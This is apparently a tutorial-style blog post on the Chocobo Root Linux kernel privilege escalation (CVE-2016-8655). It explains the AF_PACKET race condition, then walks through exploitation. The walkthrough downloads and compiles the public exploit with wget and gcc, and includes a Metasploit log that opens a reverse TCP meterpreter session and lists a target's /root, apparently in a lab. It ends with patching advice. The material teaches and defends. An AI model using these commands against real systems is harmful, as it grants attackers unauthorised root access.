Chocobo Root


The kernel is a core part of an operating system. It links applications running in “user space” to underlying hardware and allows processes to talk to each other using inter-process communication (IPC). Being monolithic in structure, Linux kernels also manage hardware, file systems, etc, as well as CPU, memory and IPC. This brings higher chance of vulnerability introductions and increases overall attack vector. As the Linux kernel is one of the most popular and widely used open-source kernels by developers, adversaries are always interested in new exploits for it.

What Is Chocobo Root?

The Chocobo Root exploit (CVE-2016-8655) was discovered by Philip Pettersson in 2016. The bug itself was introduced to the Linux kernel in 2011 and patched in 2016. It affected a variety of Linux kernel versions and distributions. Exploit DB has C code and Metasploit module for this vulnerability.
This bug allows an attacker to run arbitrary commands with administrative privileges or cause denial of service.

How Does It Work?

Unprivileged processes were allowed to create AF_PACKET sockets in older kernel versions where unprivileged namespaces were enabled by default. When TPACKET_V3 or TPACKET_V2 socket is created, a timer object is initialized and deleted after socket is closed. The issue is, if the socket version is switched to TPACKET_V1 before the packet_set_ring() function returns, the timer object will not be deleted. There is plenty of time for a second core/thread to race and make this change before that function returns. This results in a use-after-free in the timer object that can be exploited with various poisoning attacks ultimately leading to kernel jumping to a modified function pointer once the timer expires.

How to Exploit the Vulnerability?

To recreate and exploit this vulnerability you will need a vulnerable Linux distribution with downgraded kernel version and at least 2 cores/threads. The previously mentioned C code and Metasploit module were tested on Ubuntu 14.04 and 16.04 but can also be achieved on Ubuntu 18.04 with kernel versions from 4.4.0 up to 4.4.0_53.74 (not including).
First you will need to make sure that you have a vulnerable kernel version by running uname -a or uname -r.

student@server:~$ uname -a
Linux server 4.4.0-36-generic #55-Ubuntu SMP Thu Aug 11 18:01:55 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

Once the vulnerable kernel is identified, you can exploit this vulnerability with the previously mentioned C code or Metasploit module.

C Code Usage.

Download or copy the code from Exploit DB, compile it with GNU C compiler, and run the exploit.

wget -O chocobo_root.c https://www.exploit-db.com/download/40871
gcc chocobo_root.c -o chocobo_root -lpthread
./chocobo_root

Wait for the exploit to finish and grant you root shell.

DO NOT halt the exploitation process while it’s running. Halting the process might crash your kernel.

Metasploit Module Usage.

Open Metasploit Framework Console after checking the target kernel version and create a session. Once the session is established continue with following commands:

msf5 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/af_packet_chocobo_root_priv_esc
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.6.1:4444 
[*] Writing '/tmp/.v3yjzy' (250 bytes) ...
[*] Launching exploit (Timeout: 600)...
[*] Cleaning up /tmp/.v3yjzy and /tmp/.PRHvmS1zE2..
[*] Sending stage (3012516 bytes) to 192.168.6.2
[*] Meterpreter session 2 opened (192.168.6.1:4444 -> 192.168.6.2:37774) at 2020-07-13 13:55:33 +0000

meterpreter > cd /root
meterpreter > ls -l
Listing: /root
==============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  3106  fil   2020-07-02 09:19:44 +0000  .bashrc
40700/rwx------   4096  dir   2020-07-13 13:28:11 +0000  .gnupg
100644/rw-r--r--  148   fil   2020-07-02 09:19:44 +0000  .profile
40700/rwx------   4096  dir   2020-07-13 10:42:13 +0000  .ssh
100400/r--------  33    fil   2020-07-13 13:28:11 +0000  flag.txt

You now have root privileges on target machine and are free to run any commands.

How to Mitigate ?

This bug was patched fairly quickly upon discovery in 2016. You can find patched kernel versions and additional information on CVE-2016-8655 for some of Linux distributions below.

To mitigate this vulnerability you need to update your kernel and reboot system by running following commands (for Debian based distributions):

sudo apt-get update
sudo apt-get dist-upgrade
sudo reboot

Conclusion

Kernel exploits can be unstable but they are always powerful. Even though this one was patched, it doesn’t mean you are future proof. Keep your operating system and kernel up to date.

Further reading: CVE-2016-8655 Linux af_packet.c race condition (local root)

Azar Huseynli